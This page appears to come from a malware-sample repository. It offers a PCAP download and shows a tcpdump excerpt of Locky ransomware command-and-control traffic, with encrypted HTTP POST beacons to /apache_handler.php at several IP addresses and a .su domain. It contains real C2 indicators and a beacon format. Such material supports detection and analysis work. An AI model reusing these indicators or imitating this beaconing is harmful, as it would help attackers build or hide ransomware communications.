
Locky Ransomware Variant Malware PCAP File Download Traffic Sample

Download Attachments

  • 1 pcap 32
    Date added: May 24, 2019 12:01 am. Added by: admin. File size: 240 KB. Downloads: 12.

2016-09-26 15:15:14.233356 IP 10.9.26.105.49163 > 5.196.200.247.80: Flags [P.], seq 1258:1735, ack 727, win 63514, length 477: HTTP: POST /apache_handler.php HTTP/1.1
E….{@….K
.i…….P&p…n^.P…8…POST /apache_handler.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://5.196.200.247/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 5.196.200.247
Content-Length: 780
Connection: Keep-Alive

2016-09-26 15:15:14.233380 IP 5.196.200.247.80 > 10.9.26.105.49163: Flags [.], ack 1735, win 64240, length 0
E..(…………
.i.P…n^.&p..P…[………
2016-09-26 15:15:14.233382 IP 10.9.26.105.49163 > 5.196.200.247.80: Flags [P.], seq 1735:2515, ack 727, win 63514, length 780: HTTP
E..4.|@…..
.i…….P&p…n^.P….]..tRkhMmAN=%85%F3%F5_rh%8A%A6d%F2%88%17sk%5E%11%B8V%DC%22%27%B1j%01%1A%99%14%EEL%B8k%83%03%5D%CC%0Aa%27%08%90%B1o%80W%BF%C5%00%A5b&TKzJjd=%02%BE%19%DE%C4%CD%89%E7%AC%07%86%2Ak%0FX%28%8F&omNcncA=%9B%95x%FD%29%B0o%2F%5E%0Ax%F7%CF25%7Bl%EFI%E9%CE%FEo%A5%D8%B5%EC%EB%FE%21%F4%C1%BF%E0%B7%9B%8C%D4D%B5%17%11%CA%23&jZvk=%F6%13%09%C0%5D%90%D4u%93%E2%A0%89m%D9%C22u%FA%AA%B08%D2b%9C%1B%28zIG%CF%FBT%BA%40%99%EE%D3%A3.E7%0A%DED&NQkDpPm=%F3iMJ%BA%C8%CC%090%5B%A2%C4%EE%C6%04W%1B%D4%E5%9B6%26p%B2R%0E%15%CD%A3%D9%8F%7Dt%2BB%40B%B2%06%B1%12%13%19%A6E%E5%0F%8D&wpBRujHj=%90Ay%3D%F8%A8%DF%3D%D2%B8_P%F2%9F%A98%16%2C%C8d%B0%FE&lDJDaBsG=V%A8h%A2B%19%DC%FFg%1B%A0%B3%C5o%AC%08%E6%3B%0B%BE%26%D4y%EB%0FK%D3%29RC&Qdg=%94n%0F%82%A5C%7F%2F%8D%884%7F%E1f%99G%B5Q%7B%7DV%21%A52%FD%E2%99g&EJQKjhN=%21%9E%7D
2016-09-26 15:15:14.233384 IP 5.196.200.247.80 > 10.9.26.105.49163: Flags [.], ack 2515, win 64240, length 0
E..(…………
.i.P…n^.&p..P…X………
2016-09-26 15:15:14.390578 IP 5.196.200.247.80 > 10.9.26.105.49163: Flags [P.], seq 727:1453, ack 2515, win 64240, length 726: HTTP: HTTP/1.1 404 Not Found
E……………
.i.P…n^.&p..P…Q…HTTP/1.1 404 Not Found
Server: nginx/1.10.1
Date: Mon, 26 Sep 2016 19:15:28 GMT
Content-Type: text/html
Content-Length: 571
Connection: keep-alive

404 Not Found

404 Not Found


nginx/1.10.1

2016-09-26 15:15:14.390873 IP 10.9.26.105.49163 > 5.196.200.247.80: Flags [.], ack 1453, win 62788, length 0
E..(.}@….&
.i…….P&p…na.P..D[………
2016-09-26 15:15:14.391726 IP 10.9.26.105.49164 > 62.173.154.240.80: Flags [P.], seq 1260:1739, ack 727, win 63514, length 479: HTTP: POST /apache_handler.php HTTP/1.1
E….~@….c
.i>……PE…}td.P….Q..POST /apache_handler.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://62.173.154.240/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 62.173.154.240
Content-Length: 780
Connection: Keep-Alive

2016-09-26 15:15:14.391855 IP 10.9.26.105.49164 > 62.173.154.240.80: Flags [P.], seq 1739:2519, ack 727, win 63514, length 780: HTTP
E..4..@….5
.i>……PE…}td.P…&…tRkhMmAN=%85%F3%F5_rh%8A%A6d%F2%88%17sk%5E%11%B8V%DC%22%27%B1j%01%1A%99%14%EEL%B8k%83%03%5D%CC%0Aa%27%08%90%B1o%80W%BF%C5%00%A5b&TKzJjd=%02%BE%19%DE%C4%CD%89%E7%AC%07%86%2Ak%0FX%28%8F&omNcncA=%9B%95x%FD%29%B0o%2F%5E%0Ax%F7%CF25%7Bl%EFI%E9%CE%FEo%A5%D8%B5%EC%EB%FE%21%F4%C1%BF%E0%B7%9B%8C%D4D%B5%17%11%CA%23&jZvk=%F6%13%09%C0%5D%90%D4u%93%E2%A0%89m%D9%C22u%FA%AA%B08%D2b%9C%1B%28zIG%CF%FBT%BA%40%99%EE%D3%A3.E7%0A%DED&NQkDpPm=%F3iMJ%BA%C8%CC%090%5B%A2%C4%EE%C6%04W%1B%D4%E5%9B6%26p%B2R%0E%15%CD%A3%D9%8F%7Dt%2BB%40B%B2%06%B1%12%13%19%A6E%E5%0F%8D&wpBRujHj=%90Ay%3D%F8%A8%DF%3D%D2%B8_P%F2%9F%A98%16%2C%C8d%B0%FE&lDJDaBsG=V%A8h%A2B%19%DC%FFg%1B%A0%B3%C5o%AC%08%E6%3B%0B%BE%26%D4y%EB%0FK%D3%29RC&Qdg=%94n%0F%82%A5C%7F%2F%8D%884%7F%E1f%99G%B5Q%7B%7DV%21%A52%FD%E2%99g&EJQKjhN=%21%9E%7D
2016-09-26 15:15:14.391863 IP 62.173.154.240.80 > 10.9.26.105.49164: Flags [.], ack 1739, win 64240, length 0
E..(……..>…
.i.P..}td.E…P………….
2016-09-26 15:15:14.391865 IP 62.173.154.240.80 > 10.9.26.105.49164: Flags [.], ack 2519, win 64240, length 0
E..(……..>…
.i.P..}td.E…P………….
2016-09-26 15:15:14.575076 IP 62.173.154.240.80 > 10.9.26.105.49164: Flags [P.], seq 727:1453, ack 2519, win 64240, length 726: HTTP: HTTP/1.1 404 Not Found
E………..>…
.i.P..}td.E…P…….HTTP/1.1 404 Not Found
Server: nginx/1.10.1
Date: Mon, 26 Sep 2016 19:15:14 GMT
Content-Type: text/html
Content-Length: 571
Connection: keep-alive

404 Not Found

404 Not Found


nginx/1.10.1

2016-09-26 15:15:14.575385 IP 10.9.26.105.49164 > 62.173.154.240.80: Flags [.], ack 1453, win 62788, length 0
E..(..@….@
.i>……PE…}tgnP..D……….
2016-09-26 15:15:14.748030 IP 10.9.26.105.49188 > 104.239.213.7.80: Flags [S], seq 3107914475, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…..
.ih….$.P.?…….. .p……………
2016-09-26 15:15:17.758523 IP 10.9.26.105.49188 > 104.239.213.7.80: Flags [S], seq 3107914475, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…..
.ih….$.P.?…….. .p……………
2016-09-26 15:15:21.819893 IP 104.239.213.7.80 > 10.9.26.105.49188: Flags [S.], seq 3863520333, ack 3107914476, win 64240, options [mss 1460], length 0
E..,……Gbh…
.i.P.$.H.M.?..`…3………
2016-09-26 15:15:21.820158 IP 10.9.26.105.49188 > 104.239.213.7.80: Flags [.], ack 1, win 64240, length 0
E..(..@…..
.ih….$.P.?…H.NP…KC……..
2016-09-26 15:15:21.820289 IP 10.9.26.105.49188 > 104.239.213.7.80: Flags [P.], seq 1:476, ack 1, win 64240, length 475: HTTP: POST /apache_handler.php HTTP/1.1
E…..@…..
.ih….$.P.?…H.NP…….POST /apache_handler.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://cifkvluxh.su/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: cifkvluxh.su
Content-Length: 780
Connection: Keep-Alive
